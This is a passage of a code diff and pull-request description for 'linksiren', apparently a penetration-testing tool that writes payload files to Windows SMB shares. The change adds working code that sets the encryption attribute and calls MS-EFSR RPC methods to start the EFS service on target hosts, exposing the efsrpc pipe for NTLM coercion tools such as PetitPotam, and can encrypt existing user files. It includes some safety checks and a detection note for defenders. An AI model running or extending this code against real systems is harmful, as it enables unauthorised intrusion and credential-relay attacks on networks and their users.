+            entries = self.connection.listPath(shareName=share, path=pattern)
+        except Exception:
+            return None
+        candidates = []
+        for entry in entries:
+            if entry.is_directory():
+                continue
+            name = entry.get_longname()
+            if name in (".", ".."):
+                continue
+            size = entry.get_filesize()
+            if size > 0:
+                candidates.append((size, name))
+        if not candidates:
+            return None
+        candidates.sort()
+        smallest = candidates[0][1]
+        return smallest if folder == "" else f"{folder}\\{smallest}"
+
+    def _probe_writable_and_deletable(self, share: str, folder: str) -> bool:
+        """Return True if we can both create and delete a small file at ``folder``.
+
+        Writes a uniquely-named zero-byte probe and immediately deletes it.
+        Used to avoid the failure mode where deploy can create a payload but
+        cleanup can't remove it — that leaves an orphan on the share, which
+        is exactly the artifact a coordinated-disclosure-grade engagement
+        is trying not to leave behind.
+
+        Any SMB error during either step → False (and the calling code logs
+        a WARNING and skips the real write). On success the probe is gone.
+        """
+        import secrets
+
+        logger = logging.getLogger("main_logger")
+        probe_name = f".linksiren_probe_{secrets.token_hex(8)}"
+        probe_path = probe_name if folder == "" else f"{folder}\\{probe_name}"
+        probe_unc = f"\\\\{self.host}\\{share}\\{probe_path}"
+
+        # Use a fresh tree so a probe failure doesn't poison the caller's tree.
+        try:
+            probe_tree = self.connection.connectTree(share=share)
+        except Exception as e:
+            logger.warning(
+                "Probe failed: could not open tree for delete check.",
+                extra={"path": probe_unc, "exception": str(e)},
+            )
             return False
+        try:
+            try:
+                fh = self.connection.createFile(probe_tree, probe_path)
+            except Exception as e:
+                logger.warning(
+                    "Probe failed: could not write probe file. Skipping real "
+                    "payload write to avoid leaving an undeletable artifact.",
+                    extra={"path": probe_unc, "exception": str(e)},
+                )
+                return False
+            try:
+                self.connection.closeFile(probe_tree, fh)
+            except Exception:
+                pass
+            try:
+                self.connection.deleteFile(shareName=share, pathName=probe_path)
+            except Exception as e:
+                logger.warning(
+                    "Probe failed: write succeeded but delete did not. "
+                    "Skipping real payload write to avoid leaving an "
+                    "undeletable artifact. The probe file may still exist.",
+                    extra={"path": probe_unc, "exception": str(e)},
+                )
+                return False
         finally:
-            if tree_id is not None:
-                try:
-                    self.connection.disconnectTree(tree_id)
-                except Exception:
-                    pass
+            try:
+                self.connection.disconnectTree(probe_tree)
+            except Exception:
+                pass
+        return True
 
     def write_payload(
         self,
@@ -246,25 +438,49 @@ class HostTarget:
         payload_name: str,
         payload: bytes,
         force: bool = False,
+        encrypt: bool = False,
+        encrypt_keep: bool = False,
+        encrypt_target: str = "payload",
         probe_delete: bool = False,
     ):
         """Write ``payload`` to ``\\\\host\\path\\payload_name``.
 
+        If a file at the destination already exists and ``force`` is False
+        (the default), the write is skipped and ``None`` is returned with a
+        WARNING logged — the safe default in a pentest is to never silently
+        overwrite real user data with a payload that happens to share its
+        name. Pass ``force=True`` to overwrite.
+
+        When ``probe_delete`` is True, writes a small uniquely-named probe
+        file first, deletes it, and only proceeds with the real payload if
+        both steps succeed. Avoids the failure mode where deploy can write
+        but cleanup can't remove.
+
+        When ``encrypt`` is True, wakes the triggered-start EFS service on
+        the target and exposes ``\\PIPE\\efsrpc`` for follow-on coercion
+        tools (Coercer, PetitPotam). Two ``encrypt_target`` modes:
+
+        * ``"payload"`` (default): passes ``FILE_ATTRIBUTE_ENCRYPTED``
+          (0x4000) in the SMB CREATE request for the payload — NTFS asks
+          EFS to encrypt the new file, triggering the service via the SCM
+          trigger. The file is then immediately decrypted via
+          ``EfsRpcDecryptFileSrv`` so the payload lands on disk with normal
+          attributes; pass ``encrypt_keep=True`` to leave it EFS-encrypted.
+        * ``"existing"``: writes the payload as plaintext, then picks the
+          smallest non-empty existing file in the target folder, briefly
+          wakes EFS by write+delete of a hidden throwaway file, and
+          encrypts+decrypts the chosen existing file via EFSR. Net effect:
+          our payload is untouched by encryption; an existing file has its
+          mtime/atime nudged; EFS service is up and ``\\PIPE\\efsrpc`` is
+          exposed.
+
+        NTFS-only; requires the calling user to have an EFS certificate
+        available on the server.
+
         Returns the full UNC path on success, or ``None`` on any failure
-        before the bytes were committed. A failure to close the file or
-        disconnect the tree after the write is logged but still treated as
-        success and returns the UNC path. The bytes are on disk.
-
-        Safety options (both default off for backwards compatibility):
-
-        * ``force=False`` refuses to overwrite an existing file at the
-          destination and logs a WARNING. The safe default in a pentest
-          is to never silently overwrite real user data with a payload
-          that happens to share its name.
-        * ``probe_delete=True`` writes a small uniquely-named probe file
-          first and tries to delete it; the real payload is only
-          written if the probe round-trip succeeds. Avoids leaving
-          orphans on shares where the pentester can write but not delete.
+        before the bytes were committed (or when skipping an existing file).
+        A failure to close the file or disconnect the tree after the write
+        is logged but still treated as success — the bytes are on disk.
         """
         share = path.split("\\")[0]
         folder = "\\".join(path.split("\\")[1:])
@@ -283,16 +499,6 @@ class HostTarget:
             )
             return None
 
-        if not force and self._file_exists(share, payload_path):
-            logger.warning(
-                "Refusing to overwrite existing file. Pass --force to overwrite.",
-                extra={"path": full_path},
-            )
-            return None
-
-        if probe_delete and not self._probe_writable_and_deletable(share, folder):
-            return None
-
         try:
             tree_id = self.connection.connectTree(share=share)
         except Exception as e:
@@ -302,8 +508,54 @@ class HostTarget:
             )
             return None
 
+        # Safety: probe write+delete before committing real bytes.
+        if probe_delete and not self._probe_writable_and_deletable(share, folder):
+            return None
+
+        # Safety: refuse to clobber existing files unless force=True. We probe
+        # via listPath on the exact filename pattern; if the share doesn't
+        # let us list at all we silently fall through to the create attempt.
+        if not force:
+            try:
+                existing = self.connection.listPath(shareName=share, path=payload_path)
+                # listPath returns ``.`` / ``..`` even for an empty match — so
+                # we only treat it as "exists" if the matching entry's longname
+                # is the actual file we're about to write.
+                if any(e.get_longname() == payload_name for e in (existing or [])):
+                    logger.warning(
+                        "Refusing to overwrite existing file. Use force=True to override.",
+                        extra={"path": full_path},
+                    )
+                    return None
+            except Exception:
+                # Not-found / access-denied / no-listing-rights — fall through
+                # to the createFile attempt and let it speak.
+                pass
+
+        # FILE_ATTRIBUTE_ENCRYPTED = 0x4000. When the SMB CreateFile
+        # request carries this bit and the share is on NTFS, the server
+        # asks EFS to encrypt the new file — and the SCM service-trigger
+        # for "EFS named-pipe access" wakes a stopped EFS service before
+        # the create completes. That's the whole point of --encrypt:
+        # transition EFS from triggered-start-stopped to running on the
+        # target, exposing \PIPE\efsrpc for follow-on coercion tools like
+        # Coercer / PetitPotam. FILE_ATTRIBUTE_NORMAL = 0x80 is the
+        # impacket default.
+        # encrypt_target=payload requests FILE_ATTRIBUTE_ENCRYPTED on the
+        # payload itself. encrypt_target=existing writes the payload plain
+        # and uses an existing file for the trigger (handled after the write).
+        use_payload_for_trigger = encrypt and encrypt_target == "payload"
+        create_attrs = 0x4000 if use_payload_for_trigger else 0x80
+        if use_payload_for_trigger:
+            logger.info(
+                "Requested FILE_ATTRIBUTE_ENCRYPTED on create — this is the "
+                "EFS triggered-start signal.",
+                extra={"path": full_path},
+            )
         try:
-            file_handle = self.connection.createFile(tree_id, payload_path)
+            file_handle = self.connection.createFile(
+                tree_id, payload_path, fileAttributes=create_attrs
+            )
             logger.info("Opened file for writing.", extra={"path": full_path})
         except Exception as e:
             logger.error(
@@ -322,6 +574,9 @@ class HostTarget:
             )
             return None
 
+        # Close the SMB file handle BEFORE the EFSR call. The EFSR encrypt
+        # operation opens the file server-side and would conflict with our
+        # still-open SMB handle (Windows uses share-mode locking).
         try:
             self.connection.closeFile(treeId=tree_id, fileId=file_handle)
         except Exception as e:
@@ -338,7 +593,112 @@ class HostTarget:
                 "Payload written. Failed to cleanly disconnect from share.",
                 extra={"path": full_path, "exception": str(e)},
             )
-            return full_path
+            # Don't early-return — we may still want to attempt EFSR encryption.
+
+        if encrypt and encrypt_target == "existing":
+            # Pick the smallest non-empty existing file in the target folder
+            # and use set+revert against it. Requires EFS running, so wake it
+            # via a throwaway trigger file first.
+            smallest_rel = self._find_smallest_existing_file(share, folder)
+            if smallest_rel is None:
+                logger.warning(
+                    "encrypt_target=existing: no non-empty existing file "
+                    "found in target folder to use for EFS trigger.",
+                    extra={"path": f"\\\\{self.host}\\{share}\\{folder}"},
+                )
+            else:
+                smallest_unc = f"\\\\{self.host}\\{share}\\{smallest_rel}"
+                logger.info(
+                    "encrypt_target=existing: chose smallest file for EFS "
+                    "trigger.",
+                    extra={"path": smallest_unc},
+                )
+                # Wake EFS if needed (throwaway write+delete with ENCRYPTED bit)
+                self._wake_efs_via_throwaway(share, folder)
+                try:
+                    _efsr_encrypt_remote(
+                        self.connection, smallest_unc, logger=logger
+                    )
+                    logger.info(
+                        "Encrypted existing file via EfsRpcEncryptFileSrv.",
+                        extra={"path": smallest_unc},
+                    )
+                    if not encrypt_keep:
+                        try:
+                            _efsr_decrypt_remote(
+                                self.connection, smallest_unc, logger=logger
+                            )
+                            logger.info(
+                                "Reverted EFS encryption on existing file via "
+                                "EfsRpcDecryptFileSrv (file restored to "
+                                "plaintext; EFS service remains running).",
+                                extra={"path": smallest_unc},
+                            )
+                        except Exception as e:
+                            logger.warning(
+                                "Existing file encrypted but DecryptFileSrv "
+                                "revert failed. Existing file remains "
+                                "EFS-encrypted on disk — pentester should "
+                                "manually decrypt or restore.",
+                                extra={
+                                    "path": smallest_unc,
+                                    "exception": str(e),
+                                },
+                            )
+                except Exception as e:
+                    logger.warning(
+                        "encrypt_target=existing: EfsRpcEncryptFileSrv on "
+                        "the chosen existing file failed; EFS service may "
+                        "or may not have been triggered.",
+                        extra={
+                            "path": smallest_unc,
+                            "exception": str(e),
+                        },
+                    )
+        elif encrypt and not encrypt_keep:
+            # Default: revert the payload's encryption attribute via EFSR so
+            # the file lands on disk with no encryption artifact. Verified
+            # in the lab: 1) the SMB CREATE with FILE_ATTRIBUTE_ENCRYPTED
+            # already triggered EFS startup and exposed \PIPE\efsrpc;
+            # 2) the DecryptFileSrv call preserves payload content
+            # byte-for-byte (encrypt+decrypt is round-trip when both sides
+            # happen via the same logged-in user with the EFS cert).
+            try:
+                _efsr_decrypt_remote(self.connection, full_path, logger=logger)
+                logger.info(
+                    "Reverted EFS encryption via EfsRpcDecryptFileSrv "
+                    "(payload now plaintext on disk; EFS service remains "
+                    "running and \\PIPE\\efsrpc remains exposed for "
+                    "follow-on coercion).",
+                    extra={"path": full_path},
+                )
+            except Exception as e:
+                # Non-fatal: the encryption attribute is still on the file
+                # but the trigger already fired, so EFS is up. The cleanup
+                # mode still works; the file is just visibly encrypted.
+                logger.warning(
+                    "EFS trigger fired but DecryptFileSrv revert failed. "
+                    "File remains EFS-encrypted on disk. EFS service is "
+                    "still running on the target.",
+                    extra={"path": full_path, "exception": str(e)},
+                )
+        elif encrypt and encrypt_keep:
+            # Pentester explicitly asked for persistent encryption. Try the
+            # RPC to ensure the bit is fully committed; failure is OK because
+            # the createFile attr already set it.
+            try:
+                _efsr_encrypt_remote(self.connection, full_path, logger=logger)
+                logger.info(
+                    "Marked payload encrypted via EfsRpcEncryptFileSrv (kept).",
+                    extra={"path": full_path},
+                )
+            except Exception as e:
+                logger.warning(
+                    "Payload written with FILE_ATTRIBUTE_ENCRYPTED but "
+                    "EfsRpcEncryptFileSrv follow-up failed. The createFile "
+                    "attribute alone should have triggered EFS server-side.",
+                    extra={"path": full_path, "exception": str(e)},
+                )
 
         return full_path
 

--- a/tests/test_deploy_safety.py
+++ b/tests/test_deploy_safety.py
@@ -70,7 +70,7 @@ def connected_target():
 
 def test_write_payload_force_false_existing_file_skips(connected_target):
     connected_target.connection.listPath.return_value = [
-        MagicMock(is_directory=lambda: False)
+        MagicMock(get_longname=lambda: "p.url", is_directory=lambda: False)
     ]
     result = connected_target.write_payload(
         path="Finance\\2026", payload_name="p.url", payload=b"data"
@@ -81,7 +81,7 @@ def test_write_payload_force_false_existing_file_skips(connected_target):
 
 def test_write_payload_force_true_overwrites(connected_target):
     connected_target.connection.listPath.return_value = [
-        MagicMock(is_directory=lambda: False)
+        MagicMock(get_longname=lambda: "p.url", is_directory=lambda: False)
     ]
     connected_target.connection.connectTree.return_value = 1
     connected_target.connection.createFile.return_value = 42


### PR DESCRIPTION
## Summary
Add `deploy --encrypt` plus `--encrypt-target {payload,existing}` and `--encrypt-keep`. Wakes the triggered-start EFS service on the target host so `\PIPE\efsrpc` becomes available for follow-on coercion tooling (Coercer, PetitPotam).

## Changes
* **MS-EFSR client surface** (`src/linksiren/target.py`): `_efsr_call` handles the PKT_PRIVACY bind that EFSR requires and tries `\efsrpc`, `\lsarpc`, `\samr`, `\netlogon` in order. `_efsr_encrypt_remote` and `_efsr_decrypt_remote` are thin wrappers around `EfsRpcEncryptFileSrv` / `EfsRpcDecryptFileSrv`.
* **`HostTarget._wake_efs_via_throwaway`**: briefly create+delete a hidden file with `FILE_ATTRIBUTE_ENCRYPTED` (0x4000) to trigger the SCM EFS service-start. Used by `--encrypt-target=existing`.
* **`HostTarget._find_smallest_existing_file`**: picks the smallest non-zero pre-existing file in the target folder for the existing-mode trigger.
* **`HostTarget.write_payload`**: new `encrypt`, `encrypt_keep`, `encrypt_target` kwargs.
  * Default mode (`--encrypt-target=payload`): passes the encryption attribute on the payload's SMB CREATE, then calls `EfsRpcDecryptFileSrv` to revert so the payload itself lands plaintext.
  * `--encrypt-target=existing`: writes the payload plain, fires the throwaway-file trigger, then EFSR-encrypts+decrypts the smallest existing file.
  * `--encrypt-keep`: skips the post-encrypt decrypt; payload stays EFS-encrypted on disk (`Ae` attribute).
* **`arg_parser`**: `--encrypt`, `--encrypt-target {payload,existing}`, `--encrypt-keep` on the deploy subcommand.
* **`mode_handlers.handle_deploy`**: passes the three kwargs through; writes the `encrypt_triggered_hosts.txt` sidecar per run.

## Docs
* `docs/DEPLOY.md`: new EFS section covering the three flags, the trigger mechanisms, the sidecar file, and the EFS-certificate privilege requirement.
* `docs/DETECTION.md` (new): blue-team-facing artifact reference. Seeded with the EFS section (service state transitions, EFSR RPC traffic, file-attribute timeline).

## Privilege note
The calling account needs an EFS certificate to perform encrypt / decrypt operations. Domain users typically have one; built-in `Administrator` typically does not unless explicitly configured.

## Version bump
\`0.2.0\` -> \`0.3.0\` (PyPI release on merge)